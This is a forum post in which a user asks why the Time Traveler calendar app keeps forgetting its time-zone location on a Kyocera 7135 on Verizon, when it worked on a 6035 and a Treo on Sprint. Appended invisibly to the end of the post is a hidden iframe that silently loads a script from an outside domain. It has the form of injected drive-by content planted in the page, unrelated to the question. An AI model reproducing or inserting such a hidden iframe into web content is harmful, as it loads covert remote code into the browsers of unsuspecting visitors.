I'm using Time Traveler by Class Action to help me manage my calendar when I travel. The major benefit is having all my calendar entries moved to the correct time for the time zone that I'm in (my 10am MT meeting moves to 9am PT by itself - particularly useful when I go to Australia!).

I've noticed with my 7135 that Time Traveler is not remembering what location I'm in. I haven't found the trigger for what makes it reset. I thought it was resetting the 7135, but I've tried that a few times and that's not it. The only other thing I can think of is when something other than Time Traveler changes the clock (like this morning when the phone moved to DST on it's own). But, it's reset the Time Traveler location so many times in the last week that I don't think that's it - I doubt the network (Verizon) had that many time changes..... But, I wouldn't be surprised if it's a minute off occassionally and the 7135 changes it's clock when it syncs with the Verizon network.

I've used this program on my 6035 and on a Treo and not had any problems. However, it now appears to be a little confused on my 7135. The only other difference is this is the first time I've been on Verizon - both my 6035 and Treo were on Sprint.

Anyone else having this problem? Any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>